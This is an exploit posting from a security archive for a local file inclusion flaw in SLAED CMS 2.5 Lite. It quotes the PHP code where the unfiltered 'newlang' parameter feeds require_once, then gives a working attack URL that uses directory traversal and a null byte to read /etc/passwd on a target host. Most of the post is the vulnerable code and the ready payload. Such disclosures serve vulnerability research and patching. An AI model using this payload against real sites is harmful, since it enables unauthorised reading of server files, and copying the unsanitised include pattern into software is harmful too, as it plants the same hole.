what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

slaed-lfi.txt

slaed-lfi.txt
Posted Jan 24, 2008
Authored by The_HuliGun

SLAED CMS version 2.5 Lite suffers from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
SHA-256 | af400b87370b956274750ff712748b1b64e9a1745e6ac4676cce456d143ac66a

slaed-lfi.txt

Change Mirror Download
# SLAED CMS 2.5 Lite Local file inclusion

# Script url http://www.slaed.net/uploads/files/public/SLAED_CMS_2.5_Lite.zip

# Lets code in function/sources.php:

780: // Format language
781: function get_lang($module="") {
782: global $multilingual, $currentlang, $language, $user_cookie_t;
783: if (isset($_REQUEST['newlang']) && $multilingual == "1") {
784: if (file_exists("language/lang-".$_REQUEST['newlang'].".php")) {
785: setcookie("lang", $_REQUEST['newlang'], time() + intval($user_cookie_t));
786: require_once("language/lang-".$_REQUEST['newlang'].".php");
...

And in index.php:
9: require_once("function/function.php");
10: get_lang();

# As you can see variable newlang is not filtered, so, if magic_quotes_gpc turned off, we can use exploit:

http://[targethost]/[path]/index.php?newlang=../../../../../../../../../../etc/passwd%00

# Bug discovered by The_HuliGun

# Greetz to: NaTka and all people who understand...

# See u soon!

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close